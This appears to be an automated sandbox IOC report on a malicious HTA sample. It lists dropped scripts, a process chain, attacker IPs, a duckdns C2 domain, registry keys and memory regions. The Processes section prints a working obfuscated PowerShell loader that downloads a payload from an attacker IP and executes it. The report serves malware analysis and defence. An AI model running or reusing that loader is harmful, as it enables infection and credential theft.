IOC Report
goodgirlwithbestbattingwithgoodthings.hta

loading gifFilesProcessesURLsDomainsIPsRegistryMemdumps8642010010Label

Files

File Path
Type
Category
Malicious
Download
goodgirlwithbestbattingwithgoodthings.hta
HTML document, ASCII text, with very long lines (3196), with CRLF line terminators
initial sample
malicious
C:\Windows\Temp\horripilant.bat
DOS batch file, ASCII text, with CRLF line terminators
dropped
malicious
C:\Windows\Temp\undertipped.vbs
ASCII text, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\json[1].json
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\0[1].txt
Unicode text, UTF-8 text, with very long lines (22546), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ujbiycwo.t1t.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zsuwfsog.wfv.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\basblazcozkoojcy
Unicode text, UTF-16, little-endian text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\bhvAE52.tmp
Extensible storage user DataBase, version 0x620, checksum 0x78526e4d, page size 32768, DirtyShutdown, Windows version 10.0
dropped
\Device\Null
ASCII text, with CRLF line terminators, with overstriking
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\SysWOW64\mshta.exe
mshta.exe "C:\Users\user\Desktop\goodgirlwithbestbattingwithgoodthings.hta"
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c "C:\Windows\Temp\horripilant.bat"
malicious
C:\Windows\SysWOW64\wscript.exe
wscript //nologo "C:\Windows\Temp\undertipped.vbs"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#Bj#G8#YwBp#G4#ZQBy#G8#I##9#C##JwB0#Hg#d##u#HM#ZwBu#Gk#a#B0#GQ#bwBv#Gc#a#B0#Gk#dwBn#G4#aQB0#HQ#YQBi#HQ#cwBl#GI#a#B0#Gk#dwBs#HI#aQBn#GQ#bwBv#Gc#LwBl#G0#bwBo#GU#YwBp#G4#LwBw#H##bQBh#Hg#Lw#y#D##MQ#u#DQ#Mg#x#C4#Ng#0#C4#OQ#w#DI#Lw#v#Do#c#B0#HQ#a##n#Ds#J#Bw#HI#aQBt#Gk#bgB2#GE#cgBp#GE#bgB0#C##PQ#g#CQ#YwBv#GM#aQBu#GU#cgBv#C##LQBy#GU#c#Bs#GE#YwBl#C##Jw#j#Cc#L##g#Cc#d##n#Ds#J#Bl#Gw#YQBz#HQ#aQBj#Gk#cwBl#C##PQ#g#Cc#a#B0#HQ#c##6#C8#Lw#y#DE#Nw#u#DE#NQ#0#C4#NQ#1#C4#MQ#4#DU#LwB4#GE#bQBw#H##LwBj#C8#bgBl#Hc#XwBp#G0#YQBn#GU#LgBq#H##Zw#n#Ds#J#Bp#G0#YQBy#Gk#I##9#C##TgBl#Hc#LQBP#GI#agBl#GM#d##g#FM#eQBz#HQ#ZQBt#C4#TgBl#HQ#LgBX#GU#YgBD#Gw#aQBl#G4#d##7#CQ#eQBh#HI#bQB1#Gw#awBh#HM#I##9#C##J#Bp#G0#YQBy#Gk#LgBE#G8#dwBu#Gw#bwBh#GQ#R#Bh#HQ#YQ#o#CQ#ZQBs#GE#cwB0#Gk#YwBp#HM#ZQ#p#Ds#J#Bz#H##bwBv#G4#YgBv#Hc#b#Bz#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBU#GU#e#B0#C4#RQBu#GM#bwBk#Gk#bgBn#F0#Og#6#FU#V#BG#Dg#LgBH#GU#d#BT#HQ#cgBp#G4#Zw#o#CQ#eQBh#HI#bQB1#Gw#awBh#HM#KQ#7#CQ#YQBu#HQ#a#By#G8#c#Bv#H##a#Bp#Gw#aQBj#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#UwBU#EE#UgBU#D4#Pg#n#Ds#J#Bt#G8#b#Bl#GM#dQBs#GU#cw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#J#Bx#HU#YQBp#HM#eQ#g#D0#I##k#HM#c#Bv#G8#bgBi#G8#dwBs#HM#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bh#G4#d#Bo#HI#bwBw#G8#c#Bo#Gk#b#Bp#GM#KQ#7#CQ#N#BQ#Gw#ZQBh#HM#ZQ#g#D0#I##k#HM#c#Bv#G8#bgBi#G8#dwBs#HM#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bt#G8#b#Bl#GM#dQBs#GU#cw#p#Ds#J#Bx#HU#YQBp#HM#eQ#g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#DQ#U#Bs#GU#YQBz#GU#I##t#Gc#d##g#CQ#cQB1#GE#aQBz#Hk#Ow#k#HE#dQBh#Gk#cwB5#C##Kw#9#C##J#Bh#G4#d#Bo#HI#bwBw#G8#c#Bo#Gk#b#Bp#GM#LgBM#GU#bgBn#HQ#a##7#CQ#ZgBv#HU#bgBk#GU#cg#g#D0#I##k#DQ#U#Bs#GU#YQBz#GU#I##t#C##J#Bx#HU#YQBp#HM#eQ#7#CQ#aQBu#GY#b#Bh#G0#aQBu#Gc#b#B5#C##PQ#g#CQ#cwBw#G8#bwBu#GI#bwB3#Gw#cw#u#FM#dQBi#HM#d#By#Gk#bgBn#Cg#J#Bx#HU#YQBp#HM#eQ#s#C##J#Bm#G8#dQBu#GQ#ZQBy#Ck#Ow#k#GM#eQBz#HQ#aQBn#GU#cgBv#HU#cw#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bp#G4#ZgBs#GE#bQBp#G4#ZwBs#Hk#KQ#7#CQ#Z#Bl#HY#aQB0#GE#d#Bp#G8#bg#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#UgBl#GY#b#Bl#GM#d#Bp#G8#bg#u#EE#cwBz#GU#bQBi#Gw#eQBd#Do#OgBM#G8#YQBk#Cg#J#Bj#Hk#cwB0#Gk#ZwBl#HI#bwB1#HM#KQ#7#CQ#c#Bv#HM#d#Bw#Gw#aQBv#GM#ZQBu#GU#I##9#C##WwBk#G4#b#Bp#GI#LgBJ#E8#LgBI#G8#bQBl#F0#LgBH#GU#d#BN#GU#d#Bo#G8#Z##o#Cc#VgBB#Ek#Jw#p#C4#SQBu#HY#bwBr#GU#K##k#G4#dQBs#Gw#L##g#Fs#bwBi#Go#ZQBj#HQ#WwBd#F0#I#B##Cg#J#Bw#HI#aQBt#Gk#bgB2#GE#cgBp#GE#bgB0#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#JwBD#GE#cwBQ#G8#b##n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#y#Cc#KQ#p##=='; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('#','A'))); Invoke-Expression $OWjuxd"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
malicious
C:\Windows\SysWOW64\recover.exe
C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\basblazcozkoojcy"
malicious
C:\Windows\SysWOW64\recover.exe
C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\evflltkvchcbypqcclkw"
malicious
C:\Windows\SysWOW64\recover.exe
C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\oxleeluxypugadmglvwxccv"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\timeout.exe
timeout /t 1 /nobreak
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
There are 1 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://217.154.55.185/xampp/c/new_image.jpg
217.154.55.185
malicious
http://209.46.124.102/xampp/nicehome/goodgirlwithbestbattingwithgoodthings.txt
209.46.124.102
malicious
goodgirlfriendgivenmebestgiftgorentireti.duckdns.org
malicious
http://nuget.org/NuGet.exe
unknown
https://paste.ee/d/z3l8M6zb/0
23.186.113.60
http://www.imvu.comr
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
http://www.imvu.compData
unknown
http://209.46.124.102
unknown
https://paste.ee/:
unknown
https://contoso.com/License
unknown
https://www.google.com;
unknown
http://geoplugin.net/json.gphy
unknown
http://www.imvu.com
unknown
https://contoso.com/Icon
unknown
https://analytics.paste.ee
unknown
http://www.nirsoft.net
unknown
https://paste.ee/d/z3l8M6zb/0J
unknown
https://github.com/Pester/Pester
unknown
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
unknown
http://217.154.55.185
unknown
https://github.com/koswald/VBScript/blob/master/SetupPerUser.md
unknown
http://geoplugin.net/json.gp
178.237.33.50
http://geoplugin.net/json.gpD
unknown
https://www.google.com
unknown
https://paste.ee/d/z3l8M6zb/0TX
unknown
http://geoplugin.net/json.gp/C
unknown
https://aka.ms/pscore6lB
unknown
https://github.com/koswald/VBScript/blob/master/ProjectInfo.vbs
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://paste.ee/d/z3l8M6zb/0=
unknown
https://paste.ee/
unknown
https://analytics.paste.ee;
unknown
http://geoplugin.net/json.gpS
unknown
https://www.google.com/accounts/servicelogin
unknown
http://crl.micro?
unknown
https://login.yahoo.com/config/login
unknown
https://cdnjs.cloudflare.com
unknown
https://cdnjs.cloudflare.com;
unknown
http://www.nirsoft.net/
unknown
https://github.com/koswald/VBScript
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://secure.gravatar.com
unknown
https://themes.googleusercontent.com
unknown
http://www.ebuddy.com
unknown
There are 37 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
goodgirlfriendgivenmebestgiftgorentireti.duckdns.org
192.3.232.40
malicious
paste.ee
23.186.113.60
geoplugin.net
178.237.33.50

IPs

IP
Domain
Country
Malicious
209.46.124.102
unknown
United States
malicious
217.154.55.185
unknown
United Kingdom
malicious
192.3.232.40
goodgirlfriendgivenmebestgiftgorentireti.duckdns.org
United States
malicious
23.186.113.60
paste.ee
Reserved
178.237.33.50
geoplugin.net
Netherlands

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\Rmc-7QO18R
exepath
malicious
HKEY_CURRENT_USER\SOFTWARE\Rmc-7QO18R
licence
malicious
HKEY_CURRENT_USER\SOFTWARE\Rmc-7QO18R
time
malicious
HKEY_CURRENT_USER\SOFTWARE\Rmc-7QO18R
UID
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
There are 9 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
Download
3900000
unclassified section
page execute and read and write
malicious
400000
remote allocation
page execute and read and write
malicious
F18000
heap
page read and write
malicious
5EB3000
trusted library allocation
page read and write
malicious
5AF7000
trusted library allocation
page read and write
malicious
400000
system
page execute and read and write
malicious
4CC5000
heap
page read and write
365A000
heap
page read and write
35C0000
heap
page read and write
73A8000
heap
page read and write
4A91000
trusted library allocation
page read and write
35EA000
heap
page read and write
5997000
heap
page read and write
4CD3000
heap
page read and write
55BE000
stack
page read and write
2CBE000
stack
page read and write
4CD1000
heap
page read and write
4CCE000
heap
page read and write
4DA3000
trusted library allocation
page read and write
35CC000
heap
page read and write
2AC6000
heap
page read and write
4CCE000
heap
page read and write
5281000
heap
page read and write
10001000
direct allocation
page execute and read and write
95C0000
trusted library allocation
page read and write
4CEE000
stack
page read and write
F75000
heap
page read and write
4CBC000
heap
page read and write
4CD1000
heap
page read and write
3045000
heap
page read and write
34C0000
heap
page read and write
4CDA000
heap
page read and write
2A55000
heap
page read and write
364F000
heap
page read and write
4CB1000
heap
page read and write
3045000
heap
page read and write
4FA0000
remote allocation
page read and write
5281000
heap
page read and write
4CC5000
heap
page read and write
59D5000
heap
page read and write
3357000
stack
page read and write
6B4E000
stack
page read and write
3168000
heap
page read and write
4E60000
heap
page read and write
339E000
stack
page read and write
4CED000
heap
page read and write
6A2D000
heap
page read and write
4CDA000
heap
page read and write
3044000
heap
page read and write
365A000
heap
page read and write
41B000
system
page execute and read and write
5280000
heap
page read and write
29E8000
heap
page read and write
5B53000
heap
page read and write
95B0000
trusted library section
page read and write
4DA0000
trusted library allocation
page read and write
D60000
heap
page read and write
3611000
heap
page read and write
3044000
heap
page read and write
35C0000
heap
page read and write
3140000
heap
page read and write
598C000
heap
page read and write
2AD7000
heap
page read and write
800000
heap
page read and write
6B2E000
trusted library allocation
page read and write
4CBC000
heap
page read and write
2A21000
heap
page read and write
3044000
heap
page read and write
364F000
heap
page read and write
3044000
heap
page read and write
2F80000
heap
page read and write
317D000
heap
page read and write
6D7B000
stack
page read and write
52AF000
stack
page read and write
35E6000
heap
page read and write
2A58000
heap
page read and write
3168000
heap
page read and write
59E1000
heap
page read and write
4CB6000
heap
page read and write
74AD000
stack
page read and write
4D51000
heap
page read and write
4CCE000
heap
page read and write
5600000
trusted library allocation
page read and write
5A91000
trusted library allocation
page read and write
35E3000
heap
page read and write
4CCE000
heap
page read and write
5B63000
heap
page read and write
4CEA000
heap
page read and write
2A07000
heap
page read and write
5281000
heap
page read and write
4D0D000
trusted library allocation
page read and write
75DD000
stack
page read and write
4CBD000
heap
page read and write
5942000
heap
page read and write
3974000
unclassified section
page execute and read and write
4CD1000
heap
page read and write
59D7000
heap
page read and write
35D5000
heap
page read and write
4CB9000
heap
page read and write
2A44000
heap
page read and write
3641000
heap
page read and write
2EB1000
trusted library allocation
page read and write
342F000
stack
page read and write
5EEC000
stack
page read and write
6F0000
heap
page read and write
4EB9000
trusted library allocation
page read and write
4CD1000
heap
page read and write
3084000
heap
page read and write
4CC5000
heap
page read and write
2A9F000
heap
page read and write
4DFE000
stack
page read and write
5281000
heap
page read and write
833E000
stack
page read and write
7660000
trusted library allocation
page read and write
2AC3000
heap
page read and write
3612000
heap
page read and write
35ED000
heap
page read and write
3618000
heap
page read and write
5B6B000
heap
page read and write
34CA000
heap
page read and write
363B000
heap
page read and write
2A4B000
heap
page read and write
5281000
heap
page read and write
4F20000
heap
page read and write
6C2E000
stack
page read and write
4DA7000
trusted library allocation
page read and write
4CB6000
heap
page read and write
4CD1000
heap
page read and write
35ED000
heap
page read and write
4D51000
heap
page read and write
4CEA000
heap
page read and write
5281000
heap
page read and write
2AC6000
heap
page read and write
4CDA000
heap
page read and write
35F9000
heap
page read and write
2A2D000
stack
page read and write
6A21000
heap
page read and write
4D51000
heap
page read and write
735C000
heap
page read and write
2C50000
heap
page read and write
365A000
heap
page read and write
35FB000
heap
page read and write
6E3E000
stack
page read and write
2ABE000
heap
page read and write
4FA0000
remote allocation
page read and write
3560000
trusted library allocation
page read and write
2E55000
trusted library allocation
page execute and read and write
4CD1000
heap
page read and write
6DFF000
stack
page read and write
4D15000
heap
page read and write
5B63000
heap
page read and write
93F0000
trusted library section
page read and write
59B6000
heap
page read and write
80D0000
trusted library allocation
page read and write
3D30000
unclassified section
page execute and read and write
34A0000
heap
page read and write
2ABE000
heap
page read and write
360B000
heap
page read and write
365A000
heap
page read and write
F8B000
heap
page read and write
4CB9000
heap
page read and write
3084000
heap
page read and write
80A0000
heap
page read and write
4CD7000
heap
page read and write
318F000
heap
page read and write
741B000
heap
page read and write
360F000
heap
page read and write
4CF2000
heap
page read and write
6A20000
heap
page read and write
2CD0000
heap
page read and write
10000000
direct allocation
page read and write
2A55000
heap
page read and write
3044000
heap
page read and write
4CED000
heap
page read and write
45E000
system
page execute and read and write
2EE0000
heap
page read and write
2CE0000
heap
page read and write
2DB4000
stack
page read and write
2AC3000
heap
page read and write
4CA0000
heap
page read and write
4CD1000
heap
page read and write
3044000
heap
page read and write
355E000
stack
page read and write
601B000
trusted library allocation
page read and write
4CC5000
heap
page read and write
34C7000
heap
page read and write
5B57000
heap
page read and write
5281000
heap
page read and write
EBE000
stack
page read and write
4CD4000
heap
page read and write
3084000
heap
page read and write
4CD7000
heap
page read and write
4CC0000
heap
page read and write
35E8000
heap
page read and write
7610000
trusted library allocation
page read and write
4D0A000
heap
page read and write
7620000
trusted library allocation
page read and write
4FA0000
remote allocation
page read and write
6BEE000
stack
page read and write
4CD3000
heap
page read and write
593E000
heap
page read and write
4E3F000
stack
page read and write
5B63000
heap
page read and write
3044000
heap
page read and write
4CD1000
heap
page read and write
59AA000
heap
page read and write
4CC5000
heap
page read and write
364F000
heap
page read and write
59D5000
heap
page read and write
4CB1000
heap
page read and write
2AB0000
heap
page read and write
362F000
heap
page read and write
35FA000
heap
page read and write
4A3E000
stack
page read and write
2E40000
trusted library allocation
page read and write
80B0000
trusted library allocation
page execute and read and write
3570000
heap
page read and write
3084000
heap
page read and write
2A54000
heap
page read and write
35EA000
heap
page read and write
5FED000
stack
page read and write
7680000
trusted library allocation
page read and write
4CC5000
heap
page read and write
6BAF000
stack
page read and write
4CC5000
heap
page read and write
2A75000
heap
page read and write
78C000
stack
page read and write
4CDE000
heap
page read and write
6BDF000
trusted library allocation
page read and write
4EC1000
trusted library allocation
page read and write
6A33000
heap
page read and write
6A38000
heap
page read and write
398A000
heap
page read and write
59E2000
heap
page read and write
6E3D000
stack
page read and write
2EA9000
trusted library allocation
page read and write
365A000
heap
page read and write
2E6C000
stack
page read and write
2A38000
heap
page read and write
F96000
heap
page read and write
59D5000
heap
page read and write
361F000
heap
page read and write
2A49000
heap
page read and write
83C1000
trusted library allocation
page read and write
35A2000
heap
page read and write
E76000
heap
page read and write
3641000
heap
page read and write
7340000
trusted library allocation
page read and write
4CD4000
heap
page read and write
5281000
heap
page read and write
59A1000
heap
page read and write
35D5000
heap
page read and write
29B0000
heap
page read and write
4CCE000
heap
page read and write
5281000
heap
page read and write
74C0000
trusted library allocation
page read and write
81AE000
stack
page read and write
570E000
stack
page read and write
5C3B000
trusted library allocation
page read and write
74D0000
trusted library allocation
page read and write
4DEA000
trusted library allocation
page read and write
6180000
trusted library allocation
page read and write
4DDB000
trusted library allocation
page read and write
3084000
heap
page read and write
2D3E000
stack
page read and write
5281000
heap
page read and write
4CB6000
heap
page read and write
4CDA000
heap
page read and write
5281000
heap
page read and write
34D0000
heap
page read and write
5EBB000
stack
page read and write
7C7000
stack
page read and write
2DD000
stack
page read and write
6E7A000
stack
page read and write
2ABE000
heap
page read and write
4CEC000
heap
page read and write
32EE000
stack
page read and write
5FFE000
stack
page read and write
4DDE000
trusted library allocation
page read and write
593D000
heap
page read and write
71FE000
stack
page read and write
71BE000
stack
page read and write
2B6E000
stack
page read and write
5600000
trusted library allocation
page read and write
3044000
heap
page read and write
2E24000
trusted library allocation
page read and write
58A0000
heap
page read and write
360B000
heap
page read and write
2ED0000
heap
page read and write
4CCE000
heap
page read and write
2A7B000
heap
page read and write
4CC0000
heap
page read and write
4CCE000
heap
page read and write
2A5B000
heap
page read and write
2A6B000
heap
page read and write
5B6C000
heap
page read and write
4CC0000
heap
page read and write
4CD3000
heap
page read and write
3582000
heap
page read and write
4F14000
trusted library allocation
page read and write
3084000
heap
page read and write
6B2A000
trusted library allocation
page read and write
93D2000
trusted library allocation
page read and write
76B0000
trusted library allocation
page read and write
5281000
heap
page read and write
6F3F000
stack
page read and write
9732000
heap
page read and write
3120000
heap
page read and write
2ABE000
heap
page read and write
3615000
heap
page read and write
3640000
heap
page read and write
599E000
heap
page read and write
E70000
heap
page read and write
59A9000
heap
page read and write
4CDA000
heap
page read and write
5B16000
heap
page read and write
75F0000
trusted library allocation
page execute and read and write
4CCE000
heap
page read and write
2ABE000
heap
page read and write
6A30000
heap
page read and write
6A36000
heap
page read and write
2BAB000
heap
page read and write
6BEB000
trusted library allocation
page read and write
4CD3000
heap
page read and write
2AC3000
heap
page read and write
595F000
heap
page read and write
2EAC000
trusted library allocation
page read and write
34A0000
heap
page read and write
2A4A000
heap
page read and write
5B32000
heap
page read and write
35F9000
heap
page read and write
4C2F000
stack
page read and write
2A9F000
heap
page read and write
5664000
heap
page read and write
2A66000
heap
page read and write
4CB5000
heap
page read and write
4CCE000
heap
page read and write
5281000
heap
page read and write
35B1000
heap
page read and write
3084000
heap
page read and write
29E0000
heap
page read and write
4CD1000
heap
page read and write
386E000
stack
page read and write
2EAB000
stack
page read and write
5071000
heap
page read and write
6A2F000
heap
page read and write
3900000
heap
page read and write
3084000
heap
page read and write
7690000
trusted library allocation
page read and write
5B12000
heap
page read and write
315D000
stack
page read and write
318F000
heap
page read and write
8150000
trusted library allocation
page execute and read and write
FF7000
heap
page read and write
2AC3000
heap
page read and write
360C000
heap
page read and write
3160000
heap
page read and write
6A2C000
heap
page read and write
49FE000
stack
page read and write
4AED000
trusted library allocation
page read and write
2A4E000
heap
page read and write
6B23000
trusted library allocation
page read and write
362E000
heap
page read and write
759E000
stack
page read and write
3D80000
heap
page read and write
5281000
heap
page read and write
45C000
system
page execute and read and write
80C0000
trusted library allocation
page read and write
365A000
heap
page read and write
4F0F000
stack
page read and write
51AE000
stack
page read and write
3084000
heap
page read and write
475000
remote allocation
page execute and read and write
3084000
heap
page read and write
5071000
heap
page read and write
296F000
stack
page read and write
4CE4000
heap
page read and write
755E000
stack
page read and write
4D33000
heap
page read and write
35F9000
heap
page read and write
2A6B000
heap
page read and write
8140000
heap
page read and write
2B2F000
stack
page read and write
3044000
heap
page read and write
5281000
heap
page read and write
5281000
heap
page read and write
3044000
heap
page read and write
4CB0000
heap
page read and write
4CCE000
heap
page read and write
2AC6000
heap
page read and write
3045000
heap
page read and write
5A99000
trusted library allocation
page read and write
5281000
heap
page read and write
4CD1000
heap
page read and write
23BB000
stack
page read and write
364F000
heap
page read and write
2A65000
heap
page read and write
35CC000
heap
page read and write
73FD000
heap
page read and write
4A50000
trusted library allocation
page read and write
2AC3000
heap
page read and write
9700000
heap
page read and write
5B6C000
heap
page read and write
6DD9000
trusted library allocation
page read and write
395E000
unclassified section
page execute and read and write
4CB9000
heap
page read and write
CFB000
stack
page read and write
4CF1000
heap
page read and write
35F9000
heap
page read and write
5B6C000
heap
page read and write
364F000
heap
page read and write
3020000
heap
page read and write
478000
remote allocation
page execute and read and write
4CD1000
heap
page read and write
4CF2000
heap
page read and write
751E000
stack
page read and write
732C000
stack
page read and write
38E000
stack
page read and write
4CB0000
heap
page read and write
4CBC000
heap
page read and write
6CAE000
stack
page read and write
35E5000
heap
page read and write
3CC0000
unclassified section
page execute and read and write
30D0000
heap
page readonly
3044000
heap
page read and write
5666000
heap
page read and write
4CB0000
heap
page read and write
4CD5000
heap
page read and write
2A38000
heap
page read and write
4C38000
heap
page read and write
4CF5000
heap
page read and write
81B0000
trusted library allocation
page read and write
10016000
direct allocation
page execute and read and write
6D70000
trusted library allocation
page execute
6ACC000
stack
page read and write
2A5A000
heap
page read and write
2A7B000
heap
page read and write
6F7B000
stack
page read and write
3044000
heap
page read and write
2ED9000
heap
page read and write
5070000
heap
page read and write
76A0000
trusted library allocation
page read and write
4CF2000
heap
page read and write
590C000
stack
page read and write
4B2F000
stack
page read and write
35E7000
heap
page read and write
4D04000
heap
page read and write
6DD0000
trusted library allocation
page read and write
2A2F000
heap
page read and write
2A4A000
heap
page read and write
5281000
heap
page read and write
2C6F000
stack
page read and write
51EE000
stack
page read and write
3480000
heap
page read and write
3612000
heap
page read and write
6B2C000
trusted library allocation
page read and write
4CD1000
heap
page read and write
360B000
heap
page read and write
59AF000
heap
page read and write
2A63000
heap
page read and write
3040000
heap
page read and write
349E000
stack
page read and write
2865000
heap
page read and write
5281000
heap
page read and write
2A9F000
heap
page read and write
77F000
stack
page read and write
307A000
stack
page read and write
4CDC000
heap
page read and write
3614000
heap
page read and write
2BDE000
stack
page read and write
2AC6000
heap
page read and write
4CBC000
heap
page read and write
5270000
heap
page read and write
2A7C000
heap
page read and write
E40000
heap
page read and write
5BBA000
heap
page read and write
3044000
heap
page read and write
7337000
heap
page read and write
4CA3000
heap
page read and write
26F9000
stack
page read and write
4CCD000
heap
page read and write
2A57000
heap
page read and write
5B5F000
heap
page read and write
4CCE000
heap
page read and write
336C000
heap
page read and write
4CD1000
heap
page read and write
6F3E000
stack
page read and write
4CCE000
heap
page read and write
6F98000
heap
page read and write
598F000
heap
page read and write
32AF000
stack
page read and write
4D15000
heap
page read and write
3641000
heap
page read and write
2E52000
trusted library allocation
page read and write
4CD1000
heap
page read and write
593B000
heap
page read and write
4E08000
trusted library allocation
page read and write
3084000
heap
page read and write
3CF000
stack
page read and write
F57000
heap
page read and write
2A6D000
heap
page read and write
3044000
heap
page read and write
5B6C000
heap
page read and write
4D2D000
stack
page read and write
3944000
heap
page read and write
4CD1000
heap
page read and write
2A07000
heap
page read and write
4DF4000
trusted library allocation
page read and write
4CD1000
heap
page read and write
566F000
heap
page read and write
4CC3000
heap
page read and write
7640000
trusted library allocation
page read and write
6C6D000
stack
page read and write
3621000
heap
page read and write
4CEF000
heap
page read and write
3044000
heap
page read and write
76C0000
trusted library allocation
page read and write
4CED000
heap
page read and write
3609000
heap
page read and write
3DCF000
stack
page read and write
35E3000
heap
page read and write
4CFA000
heap
page read and write
5B3C000
heap
page read and write
5A10000
heap
page read and write
713E000
stack
page read and write
3045000
heap
page read and write
3615000
heap
page read and write
4D06000
heap
page read and write
362E000
heap
page read and write
2A52000
heap
page read and write
3940000
heap
page read and write
2D9B000
stack
page read and write
2ABE000
heap
page read and write
361E000
heap
page read and write
3044000
heap
page read and write
4CEA000
heap
page read and write
303C000
stack
page read and write
4CD1000
heap
page read and write
7242000
heap
page read and write
4CB1000
heap
page read and write
737D000
heap
page read and write
365A000
heap
page read and write
3628000
heap
page read and write
2ABE000
heap
page read and write
4CD1000
heap
page read and write
1010000
heap
page read and write
4CDC000
heap
page read and write
2DBE000
stack
page read and write
4CC8000
heap
page read and write
35CC000
heap
page read and write
4C60000
heap
page read and write
2E23000
trusted library allocation
page execute and read and write
595E000
heap
page read and write
360C000
heap
page read and write
4CD1000
heap
page read and write
820000
heap
page read and write
351E000
stack
page read and write
59AF000
heap
page read and write
318F000
heap
page read and write
2A6E000
heap
page read and write
5600000
trusted library allocation
page read and write
6F80000
heap
page read and write
35E3000
heap
page read and write
4DA0000
heap
page read and write
4CD3000
heap
page read and write
6A33000
heap
page read and write
4CED000
heap
page read and write
4C90000
heap
page read and write
30C0000
heap
page read and write
317E000
heap
page read and write
813D000
stack
page read and write
4CEF000
heap
page read and write
5653000
heap
page read and write
4CB0000
heap
page read and write
2E2D000
trusted library allocation
page execute and read and write
4CC5000
heap
page read and write
5281000
heap
page read and write
593B000
heap
page read and write
34D5000
heap
page read and write
4CDE000
heap
page read and write
5B53000
heap
page read and write
335A000
stack
page read and write
2A6B000
heap
page read and write
38AE000
stack
page read and write
6A33000
heap
page read and write
2AC6000
heap
page read and write
4CB1000
heap
page read and write
2B2F000
heap
page read and write
75E0000
trusted library allocation
page read and write
33C0000
heap
page read and write
3626000
heap
page read and write
120F000
stack
page read and write
4CB6000
heap
page read and write
4CCE000
heap
page read and write
3987000
heap
page read and write
83BE000
stack
page read and write
35ED000
heap
page read and write
35D5000
heap
page read and write
598F000
heap
page read and write
4CD1000
heap
